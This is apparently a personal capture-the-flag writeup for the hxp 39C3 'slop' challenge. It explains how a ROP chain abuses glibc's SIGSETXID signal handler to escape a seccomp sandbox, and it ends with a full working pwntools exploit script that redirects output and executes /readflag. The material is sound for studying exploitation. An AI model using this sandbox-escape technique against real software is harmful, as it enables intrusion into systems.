hxp 39C3 CTF: slop writeup

Although I did not attend 39C3, I played a bit the hxp CTF with justCatTheFish team. I focused on the slop pwn challenge, which we did not manage to finish in time, but we almost got it. I thought the challenge was very cool, so I decided to finish it and post this writeup.

The challege files can be downloaded here. It’s a Linux user-space binary exploitation challenge. The binary is statically linked with the following mitigations:

$ pwn checksec ./slop
Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No

From the relevant files, we also get the source code (slop.c), a readflag binary, and a Dockerfile. Because of how the permissions are set up in the Dockerfile, we can’t read the /flag.txt directly and have to run the /readflag program with the setgid bit, which prints the flag to stdout.

How `slop` works? #

The program listens on a TCP socket and handles the connection in another thread. This is what happens at a high level. First, the main thread:

TCP socket is created and listens on port 1234, waits for one connection. After a client connects, continues to point 2.
The random_memory function is called which allocates a new stack at a randomized address. The new stack is not effective yet, just allocated. I’m not sure why this is in the challenge. As it turns out, it’s not required to leak this address or explicitly use the new stack.
A new connection thread is started with the handle_request as the entrypoint.
Finally, the stack is switched to the address from point 2. and the program goes into a tight infinite loop calling sched_yield repetitively.

The connection thread does this:

Reads 0x300 bytes from the socket straight into the thread’s stack. This conveniently lands almost right at the return address (__builtin_frame_address(0)) and no canary leak is needed.
Installs a seccomp policy allowing only for syscalls: pause, nanosleep, alarm, getpid, exit, wait4, kill, getcwd, sysinfo, tkill, exit_group, waitid. Any other syscall called from this thread terminates the program.
If the return address is not overwritten, handle_request returns to pthreads (start_thread) and crashes due to calling rt_sigprocmask syscall which is not allowed.

From this behavior, we can deduce that we first need to take over the execution of the connection thread with a ROP (there is a generous 0x300 bytes budget) and from there somehow take over the execution of the main thread, which is not sandboxed by seccomp. Then, call the /readflag binary, so that it outputs flag to the socket. There are two issues here:

The main thread is stuck in this loop:
```
0x401a5d <main+269>    mov    eax, 0x18
0x401a62 <main+274>    syscall <SYS_sched_yield>
0x401a64 <main+276>    jmp    main+269
```
Even with full control over the memory from the connection thread’s ROP, we can’t break the loop. There needs to be another way of triggering execution in the main thread.
Simply calling execve on /readflag will print the flag to the stdout on the server and not to our connection. We need a way to redirect the stdout to the socket.

For the first issue, a natural solution is to trigger a signal handler which would run asynchronously in the context of the main thread. We can manipulate the memory it operates on from the connection thread and hopefully take over the execution.

For the second one, we need to call dup2 syscall but that requires code execution in the main thread as this syscall is blocked by the seccomp policy, so let’s take a look at signals first.

Finding signal handler #

The program doesn’t explicitly register any signal handlers and the seccomp policy doesn’t allow that. This means we can’t simply register a handler and then trigger it’s execution in the main thread. We need to find an already registered signal handler and trigger it with one of the allowed syscalls.

Now, how to discover the signals handled by a process? We found the right signal by trial and error, but we unfortunately lost a lot of time here. Only after the CTF, I realised, that unless the handler is somehow magically set up by the kernel, it has to show up in the strace. And indeed, the handler is registred with rt_sigaction when the connection thread is spawned:

$ strace -e t='/.*sig.*' ./slop
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
rt_sigaction(SIGRT_1, {sa_handler=0x42e9f0, sa_mask=[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x41fc60}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, ~[], [], 8)   = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

This action is registered by the pthreads library with signal number 33 (SIGRT_1 aka SIGSETXID) and the handler function __nptl_setxid_sighandler (0x42e9f0). For this challenge, it is not necessary to know what it is legitimately used for, but it runs code that is perfect for our exploitation:

/* Set by __nptl_setxid and used by __nptl_setxid_sighandler.  */
static struct xid_command *xidcmd;

/* We use the SIGSETXID signal in the setuid, setgid, etc. implementations to
   tell each thread to call the respective setxid syscall on itself.  This is
   the handler.  */
void
__nptl_setxid_sighandler (int sig, siginfo_t *si, void *ctx)
{
  int result;

  /* Safety check.  It would be possible to call this function for
     other signals and send a signal from another process.  This is not
     correct and might even be a security problem.  Try to catch as
     many incorrect invocations as possible.  */
  if (sig != SIGSETXID
      || si->si_pid != __getpid ()
      || si->si_code != SI_TKILL)
    return;

  result = INTERNAL_SYSCALL_NCS (xidcmd->syscall_no, 3, xidcmd->id[0],
				 xidcmd->id[1], xidcmd->id[2]);
  int error = 0;
  if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (result)))
    error = INTERNAL_SYSCALL_ERRNO (result);
  setxid_error (xidcmd, error);
  ...
}

This essentially means that we can call an arbitrary syscall by overwriting the xidcmd pointer to a crafted xid_command structure before triggering the handler. Here is how it looks like in the challenge:

0x42ea23 <__nptl_setxid_sighandler+51>    mov    rax, qword ptr [rip + 0x97746]     RAX, [xidcmd]
0x42ea2a <__nptl_setxid_sighandler+58>    mov    rsi, qword ptr [rax + 0x10]
0x42ea2e <__nptl_setxid_sighandler+62>    mov    rdi, qword ptr [rax + 8]
0x42ea32 <__nptl_setxid_sighandler+66>    mov    rdx, qword ptr [rax + 0x18]
0x42ea36 <__nptl_setxid_sighandler+70>    mov    eax, dword ptr [rax]
0x42ea38 <__nptl_setxid_sighandler+72>    syscall

The handler performs some prior safety checks, but we satisfy all of them:

Signal number is SIGSETXID (33) - this is always true.
Sent from the same PID - both threads share the same PID.
Sent from tkill syscall - allowed by seccomp.

Gracefully returning from the handler allows us to make multiple syscalls. We need to make sure xidcmd->error is set to 0, otherwise setxid_error will abort the program.

Full exploit #

We have all the required pieces to construct the exploit, the ROP has to:

Overwrite the xidcmd pointer.
Set up a fake xid_command structure to call dup2(4, 1) and call tkill to trigger it in the main thread.
Call nanosleep to make sure the previous step finished.
Set up a fake xid_command structure to call execve("/readflag", 0, 0) and call tkill to trigger it in the main thread.
Call pause so the program doesn’t crash.

As a side note, I couldn’t find this gadget with ropper and pwntools, weird:

$ ROPgadget --binary ./slop | grep 'xchg edi'
0x000000000047a8c6 : xchg edi, eax ; ret

And finally, here is the full exploit code:

#!/usr/bin/env python3
from pwn import *

exe = context.binary = ELF(args.EXE or './slop')

def start(argv=[], *a, **kw):
    port = 1024
    if args.REMOTE:
        return remote(args.HOST or 'localhost', port, *a, **kw)
    else:
        gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
        sleep(1)
        return remote('localhost', port, *a, **kw)

gdbscript = '''
continue
'''.format(**locals())

# ROP gadgets
pop_rax_ret = 0x4051bf
pop_rdi_ret = 0x402701
pop_rsi_ret = 0x405caf
mov_mem_rsi_rax_ret = 0x417f21 # mov qword ptr [rsi], rax; ret;
syscall_ret = 0x405972
xchg_edi_eax_ret = 0x47a8c6

# writable memory, nothing important there
fake_xidcmd = 0x4c1000
execve_path = fake_xidcmd + 0x100

def write_mem(where, what):
    return [
        pop_rsi_ret, where,
        pop_rax_ret, what,
        mov_mem_rsi_rax_ret
    ]

def syscall(syscall_nr, rdi=None, rsi=None):
    return [
        pop_rax_ret, syscall_nr,
        [pop_rdi_ret, rdi] if rdi else [],
        [pop_rsi_ret, rsi] if rsi else [],
        syscall_ret
    ]

def tkill(syscall_nr, rdi, rsi, rdx=None):
    return [
        write_mem(fake_xidcmd, syscall_nr), # rax
        write_mem(fake_xidcmd+0x8, rdi),
        write_mem(fake_xidcmd+0x10, rsi),
        write_mem(fake_xidcmd+0x18, rdx) if rdx else [],
        write_mem(fake_xidcmd+0x24, 0), # xidcmd->error has to be 0

        exe.sym['getpid'], # we can just call getpid from libc
        xchg_edi_eax_ret,

        syscall(constants.SYS_tkill,
                None, # rdi already set with xchg
                33) # SIGRT_1
    ]

rop = flat([
    # 1
    write_mem(exe.sym['xidcmd'], fake_xidcmd),

    # 2
    tkill(constants.SYS_dup2, 4, 1),

    # 3
    syscall(constants.SYS_nanosleep,
            0x4bf128, # fake timespec - 1s wait
            0),

    # 4
    write_mem(execve_path, u64(b'/readfla')),
    write_mem(execve_path+8, u64(b'g'+b'\x00'*7)),

    tkill(constants.SYS_execve, execve_path, 0, 0),

    # 5
    syscall(constants.SYS_pause)
])

io = start()
io.recvuntil(b'send me your slop:\n')
io.send(b'A'*8 + rop)
io.interactive()

hxp 39C3 CTF: slop writeup

How slop works? #

Finding signal handler #

Full exploit #

How `slop` works? #